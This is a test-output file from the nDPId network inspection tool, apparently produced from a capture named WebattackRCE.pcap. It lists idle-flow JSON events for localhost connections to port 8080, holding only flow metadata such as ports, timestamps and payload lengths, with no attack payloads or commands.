-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7440000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7440000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7440000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7440000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276758,"flow_last_seen":1576420276758,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276760,"flow_last_seen":1576420276760,"flow_idle_time":7440000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276761,"flow_last_seen":1576420276761,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7440000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7440000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276787,"flow_last_seen":1576420276787,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276789,"flow_last_seen":1576420276789,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276790,"flow_last_seen":1576420276790,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276792,"flow_last_seen":1576420276792,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276793,"flow_last_seen":1576420276793,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276794,"flow_last_seen":1576420276794,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7440000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7440000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7440000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 